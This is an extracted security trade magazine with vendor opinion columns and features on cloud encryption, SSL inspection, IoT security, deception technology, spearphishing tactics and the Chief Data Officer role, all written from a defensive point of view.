In the United States, more than 40 percent of employees use personal smartphones, tablets, or flash drives for work purposes, and 83 percent admit they prefer cloud apps to their on-premise equivalents and are likely to seek them out. But whether or not an employer explicitly sanctions cloud and app usage, the same problem persists: Once files are synced to a mobile device – which let’s face it, is a major reason to use the cloud in the first place – the cloud provider’s default encryption disappears, and files are exposed on the cloud.

More than 70 million smartphones are lost each year. Add to that the number of lost and stolen tablets, flash drives, and laptops, and it’s easy to see just how easily unencrypted data can fall into the wrong hands. Lost and stolen devices are one of the

Asaf Cidon, CEO, Sookasa


main contributors to data breaches and it’s largely because of this lack of encryption on devices.

The good news is that despite the existing flaws in cloud security, protecting your files is possible. There are a few simple ways to get more out of default cloud security infrastructure to keep your business secure:

Encrypt data at the file level. It’s no longer sufficient to protect only the perimeter, which, these days, is pretty much the same as relying only on server-side encryption. Encrypting files only at rest isn’t enough either – unless, your team isn’t syncing any files to the cloud, which just isn’t a feasible option in today’s cloud-based ecosystem.

File-level encryption, on the other hand, protects the data itself (rather than just the place it’s stored) before it ever reaches the cloud. This means that files will remain encrypted wherever they go, including mobile devices, and only authorised users will be able to

retrieve them. Deploying this kind of encryption to bolster cloud providers’ default precautions is paramount for keeping financial information, personal data, and intellectual property secure, particularly in a workplace that encourages BYOD or where team members work remotely or on the go.

deploy a cloud access security broker (CASb). Currently, only five percent of businesses use a CASB, but reports have predicted that usage will skyrocket to 85 percent by 2020. A CASB provides a unified security solution that lets team administrators detect data loss risks, deploy protections, and enforce security protocols all in one place. A CASB will also let employees continue using the cloud providers they’re already used to, but will grant administrators the necessary outlet for monitoring how files are being shared.

CASB doesn’t let data slip through the cracks, it establishes strong visibility – a must for knowing exactly where sensitive content is being stored and with whom it’s being shared. As data continues proliferating throughout the cloud, more and more businesses will start using CASBs to keep up with the information and more effectively guarantee its protection.

Separate the encryption content from the keys. When the encryption keys are kept separately from the content, a hacker won’t be able to access the content if he doesn’t have the keys. Deploy a solution that ensures this separation, allowing your IT department to good security hygiene. This way, even if your cloud provider is compromised, your data is less likely to be breached.

The cloud is quickly becoming a necessity for businesses to keep up with today’s workflow. But simply deploying cloud solutions is not enough. Businesses have to do their research and find the right enhancements that will adequately bolster their default security protocols. File-level encryption, CASBs, and content-key separation are a great place to start to ensure that your most sensitive files stay secure.

INSIghT

A CASb doesn’t let data slip through the cracks, it establishes strong visibility – a must for knowing exactly where sensitive content is being stored and with whom it’s being shared.


E

OPINION

lET’S ENCRyPT ANd dECRyPT

Paul Nicholson, Director , Product Marketing, A10 Networks, discusses why organisations need a dedicated SSL inspection platform to eliminate potential blind spots in their respective cyber defences.

ver since Edward Snowden’s revelations in 2013 SSL encryption has

become all the rage with application owners, and that, in turn, has lead to the rise of attacks hiding in SSL traffic. What’s more, movements like ‘Let’s Encrypt,’ the free, automated and open certificate authority (CA) provided by the Internet Security Research Group (ISRG), have inadvertently created a new set of vulnerabilities. Attackers are able to exploit Let’s Encrypt to generate their own seemingly legitimate SSL certificates to sign malicious code or to host malicious HTTPS sites.

Encryption allows hackers to conceal their exploits from security devices like firewalls, intrusion prevention systems and data loss prevention platforms. Some of these products cannot decrypt SSL traffic without degrading performance, while others simply cannot

decrypt SSL traffic because of their location in the network.

To counter the threat posed by SSL encryption, organisations need to decrypt and inspect inbound and outbound traffic with a dedicated SSL inspection platform that enables third-party security devices to eliminate the blind spot in corporate defences. Let’s look at three ways malware developers use encryption to escape detection:

Zeus Trojan. First identified in 2007, Zeus Trojan is one of the many types of malware that incorporates encryption. It continues to be one of the most prevalent and dangerous pieces of financial malware around, responsible for compromising approximately four million PCs in the US. as of December 2014. The Zeus attack toolkit is widely used by countless criminal groups, enabling them to develop variants that are even more sophisticated. This led to the formation of the Gameover Zeus

botnet, which leverages encrypted peer-to-peer communication for both malware distribution and command and control (C&C) communications. The FBI estimates that Gameover Zeus has been responsible for the theft of more than $100 million.

Command and control updates from social media sites. Some new malware strains use social networks, such as Twitter and Facebook, and Web-based email for command and control communications. For instance, malware can receive C&C commands from Twitter accounts or comments on Pinterest, which encrypt all communications. To detect these botnet threats, organisations need to decrypt and inspect SSL traffic, otherwise security analysts might view client machine access to social media sites as harmless.

Remote Access Trojan (RAT). G Data Software, a German security research firm, discovered a remote access


modified by the SSL inspection platform except –potentially – to block attacks.

In passive non-inline mode, the SSL inspection platform can be installed transparently without needing to update network settings. However, organisations won’t be able to effectively block all attacks, including single-packet attacks. The biggest flaw, however, is that passive mode fails to support strong encryption methods like Perfect Forward Secrecy (PFS) because the SSL inspection platform does not actively participate in the SSL key negotiation.

Whether sharing a malicious file on a social networking site or attaching malware to an email or instant message, many attacks will be cloaked in SSL. It’s time organisations invest heavily in data protection and don’t forget to decrypt and inspect all SSL traffic.

OPINION

Trojan (RAT) they named Win32.Trojan.lcoScript.A receiving C&C commands through yahoo mail. Since then, G Data – as well as consultants at Shape Security – have discovered additional Icoscript strains receiving C&C updates from Gmail draft messages. One form of the malware works by using a python script to retrieve commands and other code from the drafts folder, which stays hidden despite being open. With both Gmail and Yahoo Mail encrypting traffic, malware is able to use them to evade detection from IDS or DLP solutions. If organisations don’t decrypt and inspect traffic to email sites, they’re raising their risk of infection from these types of malware.

Encryption today accounts for roughly one-third of all Internet traffic, and it’s expected to reach two-thirds of all traffic next year when Internet powerhouses like Netflix transition to SSL. As a result, encrypted traffic will become the ‘go-to’ way of distributing malware and executing cyber-attacks simply. To detect malicious activity, organisations should decrypt and inspect SSL traffic. Otherwise, malware could be passing them by.

To solve this issue and gain SSL insight, organisations can deploy SSL inspection platforms to decrypt SSL traffic and forward it to third-party security devices for analysis. For outbound traffic, organisations own the end points but not the SSL certificates and keys. An SSL inspection platform can decrypt traffic when configured as a transparent forward proxy or an explicit proxy.

Decrypting inbound traffic destined to internal application servers is different than decrypting outbound traffic because organisations own the SSL keys. There are two main ways to decrypt inbound SSL traffic sent to internal servers:

Reverse proxy mode: SSL traffic is terminated on the SSL inspection devices and sent in clear text to inline or non-inline security devices. This mode is also referred to as ‘SSL Offload.’

Passive non-inline or inline mode: SSL traffic is decrypted using a copy of the server SSL keys. SSL traffic is not

To counter the threat posed by SSl encryption, organisations need to decrypt and inspect inbound and outbound traffic with a dedicated SSl inspection platform that enables third-party security devices to eliminate the blind spot in corporate defences.


g

Ways to secure connected devices before it’s too late.

INSIghT

artner researchers predict that by 2020 we will have 25 billion connected devices.

Meanwhile, PricewaterhouseCoopers’ Global State of Information Security Survey 2015 says that more than 70 percent of connected IoT devices, such as baby monitors, home thermostats, and televisions, are vulnerable because they lack fundamental security safeguards.

Jan Schreuder, Partner, PwC Switzerland, shared his opinion, “The Internet of Things is about much more than just ‘things’ - it is about recording every piece of data about every element of our physical lives in addition to our digital lives. Just as product safety standards and regulations have evolved to protect consumers’ physical safety, it will have to evolve quickly to protect our digital safety“.

According to Gartner analysts, machines will replace human decision-making in the near future. If vulnerable machines will indeed replace humans – then humanity will disappear pretty quickly. The biggest practical risks for non-critical connected devices are probably large-scale untargeted attacks launched ‘for fun,’ like Morris worm, causing great inconveniences for the society. However, a large-scale attack

SECuRINg ThE INTERNET Of ThINgS


and holistic assessments applicable to externally exposed devices.

Secondly, we should always try to segregate computer systems of smart devices into two separate parts: core and connectable. The first one is responsible for mission-critical functionality (such as brakes in the car or power management in a fridge), while the second one receives all necessary data from the first one, handles and sends it [if necessary] to the Internet. Since 1988, when the Morris worm made the headlines, nothing really changed in the basics of computer security: user-supplied input is the biggest evil.

Initially represented by simple buffer overflows, then heap, integer and format string flaws, in early 2000 by PHP includes, then by SQL injections and XSS. Today, we rather talk about

chained web attacks and DOM-based XSS vulnerabilities, but all these flaws have one thing in common – they are all triggered by malicious user input. Therefore, the core system should ideally not accept any input that a remote user can provide or alter.

Thirdly, connected devices should be easily resettable on a hardware level. A firmware should be reinstalled from scratch with default factory settings by pressing a single button on a device. This will enable IoT device owners to quickly recover from various attacks and malware infections once they occur. Otherwise, we will spend billions on IoT antiviruses throwing money down the drain.

Fourthly, connected device manufacturers need to be financially

liable for negligence in their firmware code and architecture. Yes, we cannot sue software developers for every single bug in the code, but obliging them to respect secure coding standards and security best-practices, implement an obligatory code review before deployment as a part of SDLC – are must have. This is a relatively new trend, but it’s starting to make more and more buzz attracting new supporters from all over the world. This approach is quite reasonable – if a toy manufacturer uses toxic plastic – he will be fined and sanctioned very quickly, so why shouldn’t the same responsibility apply for negligence in software development?

Last, but not least, IoT device manufacturers should make available to consumers which data from the

device they handle or store, and explain how to deactivate any functions that receive or send any data to the Internet. Some data, innocent at first glance, such as how many cups of coffee you consume per day, can be very valuable for health insurance companies and may be used against you. And, even if the manufacturer just processes this data via its cloud for example, the company still should alert customers about it, as if the manufacturer is compromised – hackers will easily intercept and steal the data.

As we can see from the above, just by respecting some common-sense rules and information security best practices, IoT vendors can assure secure future for connected devices around us. Will they?

INSIghT

on medical devices can kill thousands of people all over the world.

The simplest and the most efficient solution coming to my mind is to avoid plugging various objects to the Internet that do not really require Internet connection. I grew up without smart coffee machine and without a remotely manageable fridge, moreover, I feel just fine without them now. But falling economy pushes enterprises to innovate by all possible means in order to remain competitive. However, many companies just follow a market trend such as Internet connectivity, creating unnecessary and even dangerous new features in their products.

Nevertheless, nobody can overcome the basic law of economy: consumption creates demand. And while non-technical parents, guided by aggressive marketing campaigns, buy vulnerable smart Barbies for their kids, production of vulnerable IoT devices will continue growing, regardless of the consequences for consumers. Moreover, in some industries connected devices are really necessary to increase efficiency and quality of production.

For economic reasons we cannot stop the expansion of connected devices, so we need to find out how we can secure them. Practically speaking, nobody, but the manufacturers (vendors), can make connected devices secure. Below there are five basic security measures they shall undertake.

First, manufacturers of connected devices should consider any LAN area a hostile environment, such as the Internet. Many companies still think that if a device is not directly accessible from the Internet, nobody needs to be concerned about its security. Today, even the largest security companies tend to ignore risks in the LAN area, developing their products as if hackers would never probe them. Such concept is totally wrong. Since the growing quantity and quality of malware for mobile devices, combined with highly-sophisticated and almost undetectable backdoors for PCs, LAN area becomes an untrustworthy segment of a network, and should be subject to all the security best practices

Secondly, we should always try to segregate computer systems of smart devices into two separate parts: core and connectable.


d

OffENSIvE SECuRITy

Carolyn Crandall, CMO, Attivo Networks, discusses how security teams can gain the upper hand by going on the offense

and creating an environment that provides continuous real-time detection against an ever-changing landscape of cyber threats.

INSIghT

eception as a strategy has been used for years in war and, notably,

by cyber attackers. However, using deception to address threats that have bypassed traditional prevention security measures is an emerging and additional line of defence. Today’s deception-based technology abandons the reliance on known attack patterns and monitoring and instead uses advanced luring techniques and engagement servers to entice an attacker away from valuable company servers.

According to the Ponemon Institute, it takes 46 days, on average, before an attack by hackers can be fully resolved. Deception, on the other hand, detects hackers throughout the phases of the kill chain cycle, preventing them from completing the attacks.

To understand deception and decoy technologies, it’s important to understand the terms security teams, security solution providers, industry analysts, editors and others use, and sometimes misuse. Key terms include:

kill chain cycle – a definition of the steps taken within a cyber-attack, which includes: 1) reconnaissance 2) initial compromise 3) establishing

foothold 4) escalate privileges 5) internal reconnaissance 6) move laterally 7) maintain presence 8) continue to escalate privileges until the attacker completes their mission.

honeypot – a server, computer or network that appears to be an integral part of an organisation’s network or network of networks, but is, in reality, bait for hackers. The IT or security team installs honeypot software on these devices and connects them to the network. Hackers will scan the network for weaknesses and attempt to break in. When they break in, they won’t find anything, and will then attempt to run their malware. Because the malware has no impact, the hacker will attempt to install additional malware or simply move on.

honeynet – a honeynet is simply two or more honeypots on a network. IT and security teams deploy honeynets to protect larger networks or networks containing diverse types of information. Honeypots and honeynets were among the first deception-based technologies used by IT and security teams. These solutions are generally based on emulating an environment and without regular updates, may be recognised and detected by an attacker over time. Lack of a central management UI adds

to the operational cost and complexity of managing these solutions.

deception engagement servers – deception techniques are similar to a honeynet in their use of engagement servers to lure an attacker into their trap. However, with deception, advanced use of endpoint and distributed engagement servers are used to actively attract an attacker. In addition to real-time detection, advanced solutions will provide the ability to communicate with a command and control centre along with the forensics required to update prevention systems and shut down attacks. Advancements in technology have also made deception solutions non-disruptive to deploy and non-resource intensive to manage. A comprehensive deception platform will be scalable and take a deception everywhere approach, supporting user networks and data centres across private, public and hybrid cloud environments. Some may refer to a deception engagement server as a honeynet on steroids.

deception credentials – These are the lures placed on endpoint devices that work dynamically with deception engagement servers to actively draw attackers away from the enterprise’s servers and get them instead to engage with the deception engagement server.

Carolyn Crandall, CMO, Attivo Networks


Engagement or deception servers – deception providers use high interaction engagement servers that will lure, trap, and analyse an attack. Engagement or deception servers run real or emulated OS and services, support virtualisation, and can be customisation for layer two to seven deceptions. They can be located in a private data centre as well as private, hybrid and public clouds. In addition, they have a self-healing environment which, after containing and analysing an infection, can safely destroy the infected VM and rebuild itself for the next attack. Mature platforms will also have the ability to engage with C&C servers so that additional data about the attacker’s methods and intent can be understood.

Emulation – this uses best efforts to copy an environment to deceive an attacker into engaging. Since emulation is a thin copy, it can’t match exact OS and services they are running. Given their static nature, they can be easier for an attacker to detect.

Real operating systems – real operating systems and services provide significantly better authenticity over emulation solutions because they use active licenced software that is loaded on the engagement server. These solutions can be customised by turning on or off operating systems and services to match a company’s environment. Solutions that allow the loading of a company ‘golden image’ provide an environment that is virtually indistinguishable from company servers. Maintenance of these operating systems and services is provided by the deception manufacturer under a standard support agreement. There should not be additional costs or resources required to maintain this software.

friction-less (non-disruptive deployment and management) – deception solutions should integrate seamlessly with existing security infrastructure and should play an active role in an organisation’s continuous defence strategy by enabling real-time threat detection. By design, they should not require any signature or database look

up require network topology or traffic changes or require heavy computation to detect an attack.

Threat intelligence – when a BOT or APT is engaged, the solution should run full forensics to capture methods and intent of the hacker. It should include a threat intelligence dashboard and a full range of indicators of compromise (IOC) reports to enable prevention systems to shut down current attacks and prevent future ones.

false positives – many monitoring systems will trigger an alert based on what may be BOT or APT activity. These solutions tend to generate a high volume of alerts that often are not an attack and are false positives. Deception solutions will not deliver a false positive since they only deliver an alert based on actual engagement with their platform. Advanced systems will provide the option to set alerts at low, medium or high for additional customisation.

The shift to continuous detectionNew deception technologies bring a heightened level of aggressiveness in addressing cyber-attacks. Dynamic deception steps in when prevention systems fail and provides organisations with an efficient way to continuously detect intrusions with high interaction traps, engagement servers, and luring techniques to engage attackers – all without requiring additional IT staff to manage the solution

Statistics pointing to the increasing

number of threats and the growing sophistication of these threats are in the news every day. Symantec noted in an April 2015 Internet Security Report that attacks on large companies are up 40 percent over last year and Dave DeWalt, FireEye’s CEO, stated recently on 60 Minutes, “Literally, 97 percent of all companies have been breached.”

According to a recent Ponemon Institute report, the average cost of a breach has risen to $15 million. With that in mind, corporate management has a responsibility to customers, shareholders, employees and partners to do everything they can to protect critical data and IP assets.

Dynamic deception solutions are a new, powerful weapon in the IT and security team’s arsenal for protecting an organisation’s most critical assets. Prevention systems have demonstrated that they have gaps and will continue to be unreliable given the gaps in the

network’s perimeters, the sophistication of modern day cyber-attacks, adoption of new technologies and human errors

Deception can play a critical role as the next line of defence for detecting intrusions that have made their way inside the network before an attack can be completed and damages were done. Breaches can be a costly and time-consuming challenge to deal with. It’s time to turn the tables and use deception to outsmart the hackers and to protect your company’s assets and brand.

INSIghT

In addition to real-time detection, advanced solutions will provide the ability to communicate with a command and control centre along with the forensics required to update prevention systems and shut down attacks.


REASONS why PhIShINg ATTACkS ARE NASTIER ThAN EvER

Forget Nigerian princes – today’s spearphishing is sophisticated business, fooling even the most seasoned security pros

fEATuRE

P hishing emails have been the scourge of the computer world for decades,

defeating even our best efforts to combat them. Most of us can easily spot them by their subject lines and delete without even opening. If we’re not entirely sure and end up opening them, we can immediately identify a phishing attempt by its overly formal greetings, foreign origins, misspellings, and overly solicitous efforts to send us millions of unearned dollars or to sell us dubious products. Most of the time, phishing attempts are a minor menace we solve with a ‘delete’ key.

Enter spearphishing – a targeted approach to phishing that is proving nefariously effective, even against the most seasoned security pros. Why? Because they are crafted by thoughtful professionals who seem to know your business, your current projects and your interests. They don’t tip their hand by trying to sell you anything or claiming to have money to give away. In fact, today’s spearphishing attempts have far more sinister goals than simple financial theft.

Here’s a look at what sets today’s most sophisticated spearphishing attempts apart -- and how to keep from falling prey to their advances.

The attack is handcrafted by professional criminalsTraditionally, phishing emails have been created by low-end scammers who have opted for the buckshot approach – putting together a sloppy message and spam en masse. You’re bound to get someone. In fact, the more obvious the phishing attempt, the better, as this would ensure ensnaring the most gullible of victims.

Somewhere along the way this has changed. Professional and organised criminals realised that a lot of money could be made by sending out better spam messages. Brian Krebs’ 2015 bestseller ‘Spam Nation” traces the rise of professional criminal gangs in Russia that made tens of millions of dollars each year and supported multiple large companies, some of which pretended to be legitimate and were traded on stock exchanges.

Then nation-states got in the game,

realising that a handful of thoughtfully crafted emails could help them bypass the toughest defenses, simply by targeting the right employees. Today, the vast majority of advanced persistent threats (APTs) gain their first foothold inside victim companies by sending a few emails.

Today’s professional Internet criminals work five to nine days, pay taxes, get weekends and holidays off. The companies they work for often have dozens to hundreds of employees, pay bribes to local law enforcement and politicians, and are often seen as the employer of choice in their region. Being employed by companies that break into companies in other countries is often proudly worn as a patriotic badge.

These professional hacking mills employ divisions of labour. The marketing team, often led by executives, seeks customers willing to pay to hack a particular company for information, although the mills will often attack any company on spec, then market the information afterward.

The research and surveillance teams gather information about the target

10


the first to know about it. Any potentially interesting info is copied for safekeeping and future sale.

If that sounds a little different than a script kiddie whipping together a sloppy email at an Internet café, you’ll know why today’s phishing attempts are that much more effective. It’s basically a day job, won with an interview, with a salary, benefits, and project bonuses. It even comes with a nondisclosure agreement, HR hassles, and departmental politics.

Make no mistake: Phishing emails went pro.

The attack is sent by someone you knowToday’s spearphishing emails often originate from someone you email with on a daily basis, not a Nigerian prince. They often appear to be from a boss, team leader, or some other authority figure up the management chain to ensure the victim opens the email and is more likely to do whatever the email says.

The email could be from an outside, sound-alike email account meant to resemble the authoritative person’s personal email account. After all, who hasn’t received a work-related email from a co-worker who accidentally used his or her personal account? We accept it as a common mistake.

It might arrive from a sound-alike account name from a popular public email server (Hotmail, Gmail, and so on), with the sender claiming to be using this previously unknown account because they are locked out of their work email. Again, who hasn’t been through this before?

But more likely than not, the fake phishing email appears to arrive from

the other person’s real work email address, either because the phishing organisation is able to send fake email origination addresses from the outside, or it has successfully compromised the other person’s email account. The latter is becoming the most popular attack method – who wouldn’t click on a link sent by their boss?

That attack includes a project you are working onMany spearphishing victims fall prey to the fact that the malicious sender seems to know what projects they are working on. This is because spearphishers have spent time researching them or have been in control of a colleague’s email account for a while. The email may include a subject line like “Here is that report on XYZ you’ve been waiting on,” or “Here are my edits to the report you sent,” with an attached copy of a report originally sent by the receiver, but with an updated autolaunch malicious link. It might also allude to a project’s viability, asking, “Do you think this will impact our project?” or exclaiming “Someone beat us to it!” with a link to a malicious news article that appears related to the project.

There have been emails purporting to be from lawyers seeking increases in child support to individuals going through a divorce. Some people have also experienced receiving phishing

fEATuRE

company’s organisational structure, business partners, Internet-

accessible servers, software versions and current projects. They obtain much of this information by visiting the target company’s public website and breaking into a few of its weaker-protected business partners.

This research is passed along to a team of initial compromisers,

which establishes anchors inside the target organisation. This team is the most important team at the mill, and it is broken down into several skilled subgroups, each focused on a particular domain — breaking into servers, launching client-side attacks, performing social engineering attacks, or spearphishing. The spearphishing team works hand in hand with the research team, mixing relevant topics and projects with their cadre of boilerplate email templates.

There are other teams as well. Backdoor teams come in after the initial entry is secured to help ensure easy future entry by inserting backdoor Trojans, creating new user accounts, and vacuuming up every log-on credential in the compromised organisation.

Then, like any good consulting company, a longer-term team is dedicated to this “client.” This team roots around looking for important information, detailing the organisation’s structure and VIPs. Within a short amount of time they know every defense system the company has in place and how to bypass it. When some new project or big piece of data comes online, this team is among


emails from leaders of professional organisations sent out to their membership lists. There have also been cases of emails to C-level officers claiming to have pending lawsuit information, which ask the receiver to run the executable to ‘unlock’ the attached confidential PDF file. There were even some bogus updates sent to IT security pros purporting to contain a security update from a vendor, about a product they recently bought and installed.

The email subjects and body contents aren’t “Look at this!” generic ruses. Nope, today’s spearphishing email comes from someone you trust on a project you are working on. After you read a few of these you start wishing all we had to worry about was fake dying relatives and Viagra ads.

your attacker has been monitoring your company’s emailThese days corporate attackers are monitoring dozens of email accounts in your company. It’s where they get the necessary context to fool your co-workers and where they can monitor the most sensitive and valuable information in your company.

If you find out your company is compromised, assume that all C-level employees and VIP email accounts are compromised and have been for a long time. Even the initial reporting of the bad guy’s possible detection is probably in front of their eyes. They know what you know.

When faced with this sort of adversary the only solution is a completely “out of band” network, including brand-new computers and new email accounts. Anything else will probably be a waste of time.

your attacker can intercept and change emails as neededToday’s adversary isn’t merely a passive reader. They intercept and change emails, albeit slightly, when the need arises. Yes decisions may become no; no may become yes. Sometimes key recipients will be removed from the email’s receiver list. More receivers may be added. Email

groups may be modified. Encryption and signing may be turned off.

In one of the most notorious examples, a company knew it was badly compromised with an APT. In an attempt to reclaim the network, the help desk sent out an email asking every recipient to change their password. Certainly, that would make it harder for the malicious intruders to hang out -- except that the intruders had control of the help desk’s email account. Right before the email was sent, the intruders changed the embedded link so that it took users to a perfect copy of the company’s password-change website hosted under the intruder’s control. Users followed the help desk directions, but in doing so allowed intruders to capture every password change.

your attacker uses custom or built-in tools to subvert antivirus softwareFor decades, phishing emails used everyday malware tools as attachments. Today, they use custom tools, forged and encrypted expressly for you or programmes built into the operating system you are running. The result is the same – your antimalware scanner doesn’t pick up the malicious file or commands. And when the bad company is on your network, they are careful to run only the same.

Malicious scripts written in the victim’s built-in scripting languages (PowerShell, PHP and so on) are fast becoming a tool of choice. PowerShell is even showing up in malware toolkits, which end up making PowerShell-only malware programs.

Fueling this trend is the fact that it’s much harder for antimalware software, or even forensic investigators, to determine whether a legitimate tool is being used for nefarious purposes. Take Remote Desktop Protocol (RDP) connections, for example. Nearly every admin uses them. When the bad guy does too, it can be difficult to determine when the RDP connection is doing something malicious. Not only that, but it could be difficult to impossible to remove the legitimate tool to thwart the attacker without also removing the tool the good guy needs to clean up the system.

your attacker uses military-grade encryption to tunnel your data homeThe days of malware using randomly picked ports to copy data off of your

network are long gone. So too are the days of using popularly reserved ports (such as IRC port 6667) to send commands and control malicious creations remotely.

Now every malware programme works over SSL/TLS port 443 and uses industry-accepted, military-approved AES encryption. Most companies have a hard time seeing into port 443 traffic, and most don’t even try. Companies are increasingly using firewalls and other network security devices to see into 443 traffic by replacing the intruder’s 443 digital certificate with their own. But when the data in the 443 stream is further encrypted by AES, it does forensic investigators no good.

Malware writers use of standard encryption is so good that even the FBI is

These days corporate attackers are monitoring dozens of email accounts in your company. It’s where they get the necessary context to fool your co-workers and where they can monitor the most sensitive and valuable information in your company.

fEATuRE


telling ransomware victims to simply pay up. In fact if you find a malware program running on any port but 443 and not using AES encryption to cover its tracks, it’s probably by a script kiddie. Alternately, it’s been in your environment for a long time, and you only now discovered it.

your attacker covers their tracksUntil the past few years, most companies never bothered to enable their log files, or if they did, they didn’t collect them and alert on suspicious events. But times have changed and now IT defenders would be considered negligent if they didn’t enable and check logs on a routine basis.

The bad guys have responded by using techniques, such as command-line and scripting commands, that are less likely to be picked up by event logging tools, or they simply delete the logs when they are finished. Some of the more sophisticated attackers use rootkit programmes, which maliciously modify the operating system to skip any instance of their malicious tools being executed.

your attacker has been in your environment for yearsThe average time a professional criminal organisation has been in the victim’s company before being noticed is usually measured in months to years. I frequently work with companies that have multiple professional gangs in their company, and some have been inside for as long as eight years.

The very respected Verizon Data Breach Investigations Report frequently reports that most internal breaches are noticed by external parties. In most cases that’s because the external party was also compromised for years, and during its forensics investigation it noticed that its data or attackers were coming or going to another company as a staging point.

There were cases wherein the organisations found that the bad guy has been in the company for so long that the malware they were placing was part of the company’s gold image – that is, every new computer included malicious software. There were also instances where Trojans and malware programmes were allowed

to spread for years because the IT staff assumed it was a necessary software component placed by some other group within the same organisation. Hackers love these sorts of assumptions.

your attacker is not afraid of getting caughtIt used to be that a phisher would get into your company, steal money or information, and be gone as soon as possible. Getting in and out as quickly as possible meant minimizing the chances of being caught, identified, and prosecuted.

Today’s attacker is likely based in a foreign country where your legal jurisdiction and warrants don’t work. You can even identify (using legal evidence) the hacking firm, its hackers, and its physical address to their local authorities, and nothing is likely to happen.

In most of the attacks, the hackers don’t run even once they are found. To be sure, they don’t want to be found, but once they are, they hack even more freely and blatantly, as if the restraints have been pulled off.

Remediation ends up being a cat-and-mouse game where the mouse has all the advantages. At first you don’t know what they’ve compromised and how many ways they can get back in. And it all likely started because someone opened up a spearphishing email.

what you can doRemediation begins with educating all employees about the new reality of spearphishing attacks. Everyone should know that the old-style phishing emails, full of typos and promises of unearned millions, are no longer your main worry. Explain how the new spearphishing emails are handcrafted by professional criminal gangs that know exactly how

to tailor their work to seem like a legitimate email coming from someone your colleagues trust.

Employees should be told to always ask for independent confirmation

(such as a phone call or IM) before clicking and running any executable or opening any unexpected document. A quick confirmation is simply due diligence today. Tell employees

to report anything suspicious. If they accidentally

executed anything that they later became suspicious about, they should report it as well. It is important to remove the stigma and embarrassment

of being fooled. Let them know that

anyone, even security experts, can be tricked

today, given the sophistication of the attacks.

Many companies aggressively test their employees with fake phishing attempts. These attempts should use phishing email templates that are more sophisticated and less like the phishing attempts of the past. Keep testing individual employees until you get a very low percentage of easily compromised employees. If you do it right, you’ll have your employees questioning any unexpected emails asking for credentials or to execute programs. Having employees question your legitimate emails is a welcome symptom of a good education programme.

Lastly, if a spearphishing attempt is successful in your company, use the actual phish email and the compromised employee’s testimony (if they are well liked and trusted) to help teach others about today’s spearphishing environment. Anything that brings the new lessons front and centre is welcome.

The key to prevention is getting everyone to see that today’s spearphishing email is not what they were used to in the past.

fEATuRE


dO yOu NEEd A ChIEf dATA OffICER?

The C-suite is getting a little more crowded these days. Pull up a chair for the Chief Data Officer, and it might be next to the CISO.

fEATuRE

T he CDO title has been around for almost six years as companies realised

the business value of their data, and that they needed someone to rein it in. Now, as companies move into the post-infrastructure era where data is moving outside the organization and into the cloud, one Gartner analyst suggests that the CDO could be responsible for more than just managing data, understanding where it resides and who uses it. He could also focus on “strategies to improve the protection of that data as it lives in infrastructure that you don’t control anymore,” says Peter Firstbrook, Research Vice President, Gartner.

Today, there are only about 1,000 chief data and chief analytics officers

in the world, according to Gartner. By 2019, the research firm predicts that 90 percent of all global enterprises will have appointed a CDO. But exactly what the CDO’s responsibilities are and how companies will manage the overlap of duties in the C-suite remain to be seen.

For starters, the CDO’s responsibilities over governance, data risk and compliance may overlap with the duties of the CISO, according to industry watchers and current CDOs. A new chief in the C-suite can trigger confusion, uncertainty, resistance and even conflict, says Mario Faria, Research Director, Information and Analytics, Gartner CDO/CAO.

“Each CDO means something very different to every vertical and every

company,” says Justin Cerilli, Managing Director, Russell Reynolds Associates, which has seen the number of searches for data and analytics officers double every year since 2013.

Most financial services organisations need a CDO to manage data risk and compliance. Consumer packaged goods or healthcare organisations hired CDO to drive cost efficiency and cost reduction, while most media and marketing companies want CDOs to drive extra revenue. Each responsibility requires different skills, and the ranking of most desired skills has shifted dramatically in the last few years, Cerilli says.

CDOs and executive search pros offer their views on the CDO role and how it fits into the C-suite.


different executives. In many financial services companies, for instance, the CDO reports to the CFO to ensure the data they’re protecting falls in line with the regulatory requirements, Cerilli says, but sometimes the CISO has owned the IT risk. “This is where we’re seeing a lot of overlap,” he says.

finding the right CdO skillsFinancial institutions may need a CDO with risk and compliance experience, but what if it also wants to drive better customer and employee experiences, drive growth or innovate through data and analytics? “That’s a very different CDO,” Cerilli says, “which makes finding qualified, experienced candidates more challenging.”

For starters, the CDO role has evolved over the last few years from a technically-driven position to a more visionary role. In a recent survey of CEOs by Russell Reynolds, technical depth dropped to sixth place among the most important skills required for a

CDO, behind stakeholder management, storytelling and communication skills, being a visionary, the ability to execute and commercial acumen.

“The CDO is now really a culture-change role about how you enable data and create better data synergy across an organisation,” explains Cerilli. “Technical depth is still very important in order to execute, but what separates the best from the rest are those top five skills.”

According to Cerilli, the shortage of qualified candidates for CDO roles has led to some failures. “It’s tough to find people who have driven this type of change before,” he says. “People are being asked to step up into roles that they’re probably not ready for, and they’re probably being promoted for their technical acumen. However, what’s going to make you successful is less about that and more about how you navigate an organisation and influence them to start using data as a tool. As a result, some technical experts flounder in this role.

“Companies have also hired consultants who are experienced in change management for the CDO role, but most are better able to present a solution than to own and execute it,’” he adds.

A short lifespan?One chief data officer believes that the CDO movement is just industry hype, and that five years from now they will disappear from the C-suite.

“Many companies appoint CDOs because they feel the pressure around them,” says Dimitris Agrafiotis, Chief Data Officer, Covance. “The CDO role will ride the hype curve – and when many of these companies get disappointed by the results because of the people they hire for these roles, the pendulum will swing and their responsibilities will be absorbed by other departments.”

But for now, the CDO search continues for many companies. “With every person you hire for one of these roles, there’s a little bit of risk to the organisation,” Cerilli says, “but it’s a risk you need to take in order to drive culture change.”

fEATuRE

The CISO-CdO partnership“The CDO role is an influencing role across the organisation,” Cerilli says. “You can’t have responsibility for all information across all the company because there are different stakeholders in different business units. The best of the best CDOs and CISOs realise that they need to work together to drive the change that’s necessary.”

Derek Strauss who became TD Ameritrade’s first chief data officer in 2012, says he has developed a collaborative relationship with the CISO on issues of data security and considers himself a mediator between the CISO and business units.

“The business community wants data in their hands as quickly as possible, but the CISO has rightly secured the data. They are [pulling] in opposite directions,” he explains. “We jump in the middle and say ‘what’s really important is determining who can see the data and do what with the data. The CDO helps the organisation determine who the data owners are so they can act in that role.”

Their relationship continues to evolve as the company ramps up its analytics environment. Their biggest challenge continues to be “marrying up the need to secure the data and the need to give access to it,” Strauss says. Both Strauss and the CISO report to the COO.

Kay Vicino, Senior Vice President and Chief Data Office, US Bancorp, says “We have a CISO who is more focused on perimeter data security. My focus is more data governance in-house, as well as supporting our analytics initiatives. I report to the CIO. Previously so did the CISO, but he now reports to the vice chairmain of technology and operations.”

